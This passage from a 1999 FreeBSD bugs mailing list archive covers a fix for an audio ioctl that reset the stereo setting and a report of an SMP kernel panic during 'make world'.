>Description: > > splay plays mp3 at low speed. The problem is that it tries to set stereo > but gets mono. > > SNDCTL_DSP_SETFMT now resets the AFMT_STERO bit. This was not the case in earlier kernels (from 990901 for example) > For the record, this fixes a problem I had with my GUS PnP Pro and pcmplay(1), which comes with tosha. It set stereo before setting the format, and the result was what sounded like low speed. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 14:10: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EF94514EAD for ; Sat, 6 Nov 1999 14:10:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA77242; Sat, 6 Nov 1999 14:10:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 257E914F65; Sat, 6 Nov 1999 14:08:32 -0800 (PST) Message-Id: <19991106220832.257E914F65@hub.freebsd.org> Date: Sat, 6 Nov 1999 14:08:32 -0800 (PST) From: arousch@home.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14751: SMP system crash while running make world Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14751 >Category: kern >Synopsis: SMP system crash while running make world >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Nov 6 14:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrew Rousch >Release: 3.3-stable #5 >Organization: >Environment: FreeBSD tiberius.null0.org 3.3-STABLE FreeBSD 3.3-STABLE #5: Sat Nov 6 10:22:25 CST 1999 root@tiberius.null0.org:/usr/src/sys/compile/TIBERIUSK i386 >Description: While running 'make world' and TOP the following fatal error stopped the system: ------------ panic: lockmgr: locking against myself mp_lock = 01000001; cpuid = 1; lapic.id = 00000000 boot() called on cpu#1 syncing disks... 166 166 166 166 166 166 166 166 166 166 166 166 166 166 166 166 166 166 166 166 giving up Automatic reboot in 15 seconds ------------------ This is on a system running an SMP kernel with dual pentium pro 200's and 96MB of ram. >How-To-Repeat: This error occured when: 1. A 'make world &' was running 2. 'top' was running as root to the console 3. user secure shelled into the system 'su'ed' and ran 'top' to his screen. At such time the system got upset. >Fix: no known fix >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Nov 6 20:27:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ACE4614D9D; Sat, 6 Nov 1999 20:27:32 -0800 (PST) (envelope-from tanimura@FreeBSD.org) Received: (from tanimura@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA02997; Sat, 6 Nov 1999 20:27:32 -0800 (PST) (envelope-from tanimura@FreeBSD.org) Date: Sat, 6 Nov 1999 20:27:32 -0800 (PST) From: Message-Id: <199911070427.UAA02997@freefall.freebsd.org> To: pantzer@ludd.luth.se, tanimura@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/14372: The audio ioctl SNDCTL_DSP_SETFMT affects the stereo setting Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: The audio ioctl SNDCTL_DSP_SETFMT affects the stereo setting State-Changed-From-To: open->closed State-Changed-By: tanimura State-Changed-When: Sat Nov 6 20:27:14 PST 1999 State-Changed-Why: Fixed in rev 1.6(with a monor change). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message